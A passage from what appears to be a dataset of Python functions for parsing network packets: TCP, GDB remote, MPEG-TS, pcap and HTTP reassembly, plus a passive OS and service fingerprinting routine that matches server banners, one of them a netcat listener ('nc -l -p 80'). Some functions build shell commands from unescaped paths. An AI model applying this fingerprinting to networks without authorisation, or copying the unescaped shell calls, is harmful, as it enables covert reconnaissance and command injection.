parse_TCP(network_layer['payload'])\n return (link_layer, network_layer, transport_layer)", "def decodepkt(self, pkt):\n res = \"\"\n if pkt.startswith('$'):\n try:\n self.logger.debug('unpack< %s', pkt) \n res = self.unpack(pkt)\n except ValueError as ex:\n self.logger.debug('GDB-< %s', res)\n self.logger.warning('Bad packet %s', ex) \n self.s.send(b'-')\n else:\n self.s.send(b'+')\n self.logger.debug('GDB+< %s', res) \n return res\n else:\n self.logger.warning('discards %s', pkt)", "def __parse(self, packet: bytes) -> TSPacket.TSPacket:\n p = TSPacket.TSPacket()\n try:\n b1, b23, b4 = struct.unpack('>BHB', packet[0:4])\n # 4-byte Transport Stream Header\n p.tsh_sync = b1\n p.tsh_tei = (b23 & 32768) >> 15\n p.tsh_pusi = (b23 & 16384) >> 14\n p.tsh_tp = (b23 & 8192) >> 13\n p.tsh_pid = b23 & 8191\n p.tsh_tsc = (b4 & 192) >> 6\n p.tsh_afc = (b4 & 48) >> 4\n p.tsh_cc = b4 & 15\n # Adaptation Field\n if p.tsh_afc == 2 or p.tsh_afc == 3:\n p.af_length = packet[4] # b1\n if p.af_length != 0:\n b2 = packet[5]\n p.af_disc = (b2 & 128) >> 7\n p.af_random = (b2 & 64) >> 6\n p.af_espi = (b2 & 32) >> 5\n p.af_pcrf = (b2 & 16) >> 4\n p.af_opcrf = (b2 & 8) >> 3\n p.af_spf = (b2 & 4) >> 2\n p.af_tpdf = (b2 & 2) >> 1\n p.af_afef = b2 & 1\n pos = 6\n if p.af_pcrf:\n # p.af_pcr = packet[6:12]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_pcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_opcrf:\n # p.af_opcr = packet[pos:(pos+6)]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_opcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_spf:\n p.af_sc = packet[pos]\n pos += 1\n if p.af_tpdf:\n l = packet[pos]\n pos += 1\n p.af_tpd = packet[pos:(pos+l)]\n pos += l\n if p.af_afef:\n l = packet[pos]\n pos += 1\n p.af_ae = packet[pos:(pos+l)]\n # Calculate payload start byte\n if p.tsh_afc == 1:\n p.payload = 4\n elif p.tsh_afc == 3:\n p.payload = 5 + p.af_length\n return p\n except Exception as err:\n logging.warning('TS packet parsing error:' + str(err))\n return None", "def _parse(self):\n \n global _tcp_buf\n _tcp_buf = {}\n number = 1\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n self.pcap_packets.append(pcap_packet)\n pcap_packet.pcap_num = number\n number += 1\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n \n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n 
\n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip.packet[pcap_packet.ip.header_len: ])\n \n #skip the packets that is not http packet\n if (pcap_packet.tcp.src_port != 80 and pcap_packet.tcp.dst_port != 80):\n continue\n \n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, pcap_packet.pcap_num)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def process_pcap(pcap):\n\n print \"Processing\", pcap\n pcap_path, _ = os.path.splitext(pcap)\n # strip_payload_from_pcap(pcap)\n os.system(\"tshark -nn -T fields -E separator=/t -e frame.time_epoch\"\n \" -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport\"\n \" -e ip.proto -e ip.len -e ip.hdr_len -e tcp.hdr_len -e data.len\"\n \" -e tcp.flags -e tcp.options.timestamp.tsval\"\n \" -e tcp.options.timestamp.tsecr -e tcp.seq -e tcp.ack\"\n \" -e tcp.window_size_value -e expert.message \"\n \" -r %s > %s.tshark\" % (pcap, pcap_path))\n # tcpdump command from Panchenko's raw-to-tcp script\n os.system(\"\"\"tcpdump -r {0} -n -l -tt -q -v | sed -e 's/^[ ]*//' |\n awk '/length ([0-9][0-9]*)/{{printf \"%s \",$0;next}}{{print}}' > {1}\"\"\".\\\n format(pcap, pcap_path + '.tcpdump'))", "def processpacket(p):\n\n\tglobal SynSentToTCPService\n\tglobal SynAckSentToTCPClient\n\tglobal LiveTCPService\n\tglobal LiveTCPClient\n\tglobal LiveUDPService\n\tglobal LiveUDPClient\n\tglobal NmapServerDescription\n\tglobal ManualServerDescription\n\tglobal ClientDescription\n\tglobal MacAddr\n\tglobal OSDescription\n\tglobal ServiceFPs\n\tglobal SipPhoneMatch\n\tglobal Devel\n\tglobal IsRouter\n\tglobal DNSRecord\n\tglobal HostIPs\n\n\tif (type(p) == Dot3) and (type(p['LLC']) == LLC):\n\t\tUnhandledPacket(p)\n\t\t#Spanning Tree Protocol\n\t\t#Debug(\"802.3\")\n\t\t#p.show()\n\t\t#print type(p['LLC'])\n\telif (p['Ethernet'] == None):\n\t\tDebug(\"non-ethernet packet\")\t\t#Need more details on how to handle.\n\t\tUnhandledPacket(p)\n\t\t#p.show()\n\t\t#print type(p)\n\t\t#quit()\n\telif p['Ethernet'].type == 0x0806:\t\t#ARP\n\t\t#pull arp data from here instead of tcp/udp packets, as these are all local\n\t\tif (p['ARP'].op == 1):\t\t\t#1 is request (\"who-has\")\n\t\t\tpass\n\t\tif (p['ARP'].op == 2):\t\t\t#2 is reply (\"is-at\")\n\t\t\tif (p['ARP.psrc'] != None) and (p['ARP.hwsrc'] != None):\n\t\t\t\tIPAddr=p['ARP.psrc']\n\t\t\t\tMyMac=p['ARP.hwsrc'].upper()\n\t\t\t\tif (not MacAddr.has_key(IPAddr)) or (MacAddr[IPAddr] != MyMac):\n\t\t\t\t\tReportId(\"MA\", IPAddr, 'Ethernet', MyMac, '')\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x0800:\t\t#IP\n\t\tsIP=str(p['IP'].src)\n\t\tdIP=str(p['IP'].dst)\n\t\t#Best to get these from arps instead; if we get them from here, we get router macs for foreign addresses.\n\t\t#if not MacAddr.has_key(sIP):\n\t\t#\tReportId(\"MA\", sIP, \"Ethernet\", p['Ethernet'].src, '')\n\t\t#if not MacAddr.has_key(dIP):\n\t\t#\tReportId(\"MA\", dIP, \"Ethernet\", p['Ethernet'].dst, '')\n\n\t\tif p['IP'].proto == 1:\t\t\t#ICMP\n\t\t\tType = p['ICMP'].type\n\t\t\tCode = p['ICMP'].code\n\n\t\t\tif (Type == 0):\t\t\t\t\t\t#Echo reply\n\t\t\t\tif (not(OSDescription.has_key(sIP))):\n\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", 'icmp echo reply')\n\t\t\telif (Type == 3) and (type(p[IPerror]) == 
IPerror):\t#Unreachable, check that we have an actual embedded packet\n\t\t\t\t#if (type(p[IPerror]) != IPerror):\n\t\t\t\t#\tp.show()\n\t\t\t\t#\tprint type(p[IPerror])\n\t\t\t\t#\tquit()\n\t\t\t\tOrigdIP = p[IPerror].dst\n\t\t\t\tif (Code == 0):\t\t\t\t\t#Net unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"NetUn\", \"router\", \"\")\n\t\t\t\telif (Code == 1):\t\t\t\t#Host unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"HostUn\", \"router\", \"\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 17):\t#Port unreachable and embedded protocol = 17, UDP, as it should be\n\t\t\t\t\tDNSServerLoc = p[IPerror].src + \",UDP_53\"\n\t\t\t\t\tif (p[UDPerror].sport == 53) and (ManualServerDescription.has_key(DNSServerLoc)) and (ManualServerDescription[DNSServerLoc] == \"dns/server\"):\n\t\t\t\t\t\t#If orig packet coming from 53 and coming from a dns server, don't do anything (closed port on client is a common effect)\n\t\t\t\t\t\t#Don't waste time on port unreachables going back to a dns server; too common, and ephemeral anyways.\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\t#If orig packet coming from something other than 53, or coming from 53 and NOT coming from a dns server, log as closed\n\t\t\t\t\t\tOrigDPort = str(p[UDPerror].dport)\n\t\t\t\t\t\tOrigDstService = OrigdIP + \",UDP_\" + OrigDPort\n\t\t\t\t\t\tif ((not LiveUDPService.has_key(OrigDstService)) or (LiveUDPService[OrigDstService] == True)):\n\t\t\t\t\t\t\tLiveUDPService[OrigDstService] = False\n\t\t\t\t\t\t\tReportId(\"US\", OrigdIP, \"UDP_\" + OrigDPort, \"closed\", \"port unreachable\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 6) and (p[TCPerror].dport == 113):\t#Port unreachable and embedded protocol = 6, TCP, which it shouldn't. May be the same firewall providing the TCP FR's\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 6):\t\t\t\t#Net unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unknown')\n\t\t\t\telif (Code == 7):\t\t\t\t#Host unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unknown')\n\t\t\t\telif (Code == 9):\t\t\t\t#Network Administratively Prohibited\n\t\t\t\t\tpass\t\t\t\t\t#Can't tell much from this type of traffic. 
Possibly list as firewall?\n\t\t\t\telif (Code == 10):\t\t\t\t#Host Administratively Prohibited\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 11):\t\t\t\t#Network unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 12):\t\t\t\t#Host unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 13):\t\t\t\t#Communication Administratively prohibited\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (Type == 8):\t\t\t\t\t#ping\n\t\t\t\t#FIXME - check payload for ping sender type, perhaps\n\t\t\t\tpass\n\t\t\telif (Type == 11):\t\t\t\t\t#Time exceeded\n\t\t\t\tif (Code == 0):\t\t\t\t\t#TTL exceeded\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\t#FIXME - put original target IP as column 5?\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"TTLEx\", \"router\", \"\")\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 2:\t\t#IGMP\n\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 6:\t\t#TCP\n\t\t\tsport=str(p['TCP'].sport)\n\t\t\tdport=str(p['TCP'].dport)\n\t\t\t#print p['IP'].src + \":\" + sport + \" -> \", p['IP'].dst + \":\" + dport,\n\t\t\tif (p['TCP'].flags & 0x17) == 0x12:\t#SYN/ACK (RST and FIN off)\n\t\t\t\tCliService = dIP + \",TCP_\" + sport\n\t\t\t\tif not SynAckSentToTCPClient.has_key(CliService):\n\t\t\t\t\tSynAckSentToTCPClient[CliService] = True\n\n\t\t\t\t#If we've seen a syn sent to this port and have either not seen any SA/R, or we've seen a R in the past:\n\t\t\t\t#The last test is for a service that was previously closed and is now open; report each transition once.\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == False)) ):\n\t\t\t\t\tLiveTCPService[Service] = True\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", '')\n\t\t\telif (p['TCP'].flags & 0x17) == 0x02:\t#SYN (ACK, RST, and FIN off)\n\t\t\t\tService = dIP + \",TCP_\" + dport\n\t\t\t\tif not SynSentToTCPService.has_key(Service):\n\t\t\t\t\tSynSentToTCPService[Service] = True\n\t\t\t\t#Debug(\"trying to fingerprint \" + sIP)\n\t\t\t\ttry:\n\t\t\t\t\tp0fdata = p0f(p)\n\t\t\t\t\t#FIXME - reasonably common occurence, don't whine, just fix it.\n\t\t\t\t\t#if (len(p0fdata) >1):\n\t\t\t\t\t#\tDebug(\"More than one OS fingerprint for \" + sIP + \", using the first.\")\n\t\t\t\t\tif (len(p0fdata) >=1):\n\t\t\t\t\t\tPDescription = p0fdata[0][0] + \" \" + p0fdata[0][1] + \" (\" + str(int(p0fdata[0][2]) + 1)\t#FIXME - Grabbing just the first candidate, may need to compare correlation values; provided?\n\t\t\t\t\t\tif (p0fdata[0][2] == 0):\n\t\t\t\t\t\t\tPDescription = PDescription + \" hop away)\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tPDescription = PDescription + \" hops away)\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t#[N][2] param appears to be distance away in hops (but add 1 to this to get real hop count?)\n\t\t\t\t\t\tPDescription = PDescription.replace(',', ';')\t\t#Commas are delimiters in output\n\t\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\t\texcept:\n\t\t\t\t\tPDescription = 'p0f failure'\n\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\tDebug(\"P0f failure in \" + sIP + \":\" + sport + \" -> \" + dIP + \":\" + dport)\n\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", 
\"live\", PDescription)\n\t\t\telif (p['TCP'].flags & 0x07) == 0x01:\t#FIN (SYN/RST off)\n\t\t\t\tCliService = sIP + \",TCP_\" + dport\n\t\t\t\tif ( (SynAckSentToTCPClient.has_key(CliService)) and ((not LiveTCPClient.has_key(CliService)) or (LiveTCPClient[CliService] == False)) ):\n\t\t\t\t\tLiveTCPClient[CliService] = True\n\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", '')\n\t\t\telif (p['TCP'].flags & 0x07) == 0x04:\t#RST (SYN and FIN off)\n\t\t\t\t#FIXME - handle rst going in the other direction?\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == True)) ):\n\t\t\t\t\tLiveTCPService[Service] = False\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"closed\", '')\n\t\t\telif ((p['TCP'].flags & 0x3F) == 0x15) and (sport == \"113\"):\t#FIN, RST, ACK (SYN, PSH, URG off)\n\t\t\t\t#This may be a firewall or some other device stepping in for 113 with a FIN/RST.\n\t\t\t\tpass\n\t\t\telif (p['TCP'].flags & 0x17) == 0x10:\t#ACK (RST, SYN, and FIN off)\n\t\t\t\t#FIXME - check for UnhandledPacket placement in ACK\n\t\t\t\tFromPort = sIP + \",TCP_\" + sport\n\t\t\t\tToPort = dIP + \",TCP_\" + dport\n\t\t\t\tPayload = str(p['Raw.load'])\t\t\t#For some reason this doesn't handle p['Raw'].load\n\t\t\t\tif ( (LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True) and (LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\n\t\t\t\t\tprint \"Logic failure: both \" + FromPort + \" and \" + ToPort + \" are listed as live services.\"\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\telif ((LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True)):\t#If the \"From\" side is a known TCP server:\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort) ):\t\t#Check nmap fingerprint strings for this server port\n\t\t\t\t\t\tif (ServiceFPs.has_key(int(sport))):\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs[int(sport)]:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\t#Debugging:\n\t\t\t\t\t\t\t\t\t#FIXME - removeme once understood:\n\t\t\t\t\t\t\t\t\t#File \"/home/wstearns/med/programming/python/passer/passer.py\", line 504, in processpacket\n\t\t\t\t\t\t\t\t\t#OutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\t#TypeError: expected a character buffer object\n\t\t\t\t\t\t\t\t\tif (OneTuple[1] == None):\n\t\t\t\t\t\t\t\t\t\tDebug(\"Null description for \" + OneTuple[0])\n\t\t\t\t\t\t\t\t\t\t#quit()\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\t#Example: Replace \"$1\" with MatchObj.group(1)\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), str(MatchObj.group(Index)))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t#Exit for loop, no need to check any more fingerprints now that we've found a match\n\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort)):\t\t#If the above loop didn't find a server description\n\t\t\t\t\t\tif (ServiceFPs.has_key('all')):\t\t\t\t#Now recheck 
against regexes not associated with a specific port (port 'all').\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs['all']:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif (not ManualServerDescription.has_key(FromPort) ):\n\t\t\t\t\t\tif (sport == \"22\") and (Payload != None) and (Payload.find('SSH-') > -1):\n\t\t\t\t\t\t\tif ( (Payload.find('SSH-1.99-OpenSSH_') > -1) or (Payload.find('SSH-2.0-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/openssh\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/openssh\"\n\t\t\t\t\t\t\telif (Payload.find('SSH-1.5-') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/generic\"\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' ESMTP Sendmail ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/sendmail\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/sendmail\"\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' - Welcome to our SMTP server ESMTP') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t#Check for port 80 and search for \"Server: \" once\n\t\t\t\t\t\telif (sport == \"80\") and (Payload != None) and (Payload.find('Server: ') > -1):\n\t\t\t\t\t\t\tif (Payload.find('Server: Apache') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/apache\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/apache\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Embedded HTTP Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/embedded\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/embedded\"\n\t\t\t\t\t\t\telif (Payload.find('Server: gws') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/gws\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/gws\"\n\t\t\t\t\t\t\telif (Payload.find('Server: KFWebServer') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/kfwebserver\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/kfwebserver\"\n\t\t\t\t\t\t\telif (Payload.find('Server: micro_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + 
sport, \"listening\", \"http/micro-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/micro-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Microsoft-IIS') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/iis\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/iis\"\n\t\t\t\t\t\t\telif (Payload.find('Server: lighttpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/lighttpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/lighttpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: MIIxpc') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mirrorimage\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mirrorimage\"\n\t\t\t\t\t\t\telif (Payload.find('Server: mini_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mini-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mini-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nc -l -p 80') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nc\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nc\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nginx/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nginx\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nginx\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Nucleus') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nucleus\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nucleus\"\n\t\t\t\t\t\t\telif (Payload.find('Server: RomPager') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/rompager\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/rompager\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/server\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/server\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Sun-ONE-Web-Server/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/sun-one\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/sun-one\"\n\t\t\t\t\t\t\telif (Payload.find('Server: TrustRank Frontend') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/trustrank\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/trustrank\"\n\t\t\t\t\t\t\telif (Payload.find('Server: YTS/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/yahoo\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/yahoo\"\n\t\t\t\t\t\t\telif (Payload.find('HTTP/1.0 404 Not Found') > -1) or (Payload.find('HTTP/1.1 200 OK') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/generic\"\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"110\") and (Payload != None) 
and (Payload.find('POP3 Server Ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"pop3/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"pop3/generic\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find('* OK dovecot ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/dovecot\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/dovecot\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find(' IMAP4rev1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"783\") and (Payload != None) and (Payload.find('SPAMD/1.1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"spamd/spamd\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"spamd/spamd\"\n\t\t\t\t\t\telif ( (sport == \"3128\") or (sport == \"80\") ) and (Payload != None) and (Payload.find('Via: ') > -1) and (Payload.find(' (squid/') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"proxy/squid\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"proxy/squid\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\telif ((LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\t\t#If the \"To\" side is a known TCP server:\n\t\t\t\t\tClientKey = sIP + \",TCP_\" + dport\t#Note: CLIENT ip and SERVER port\n\t\t\t\t\tif (not 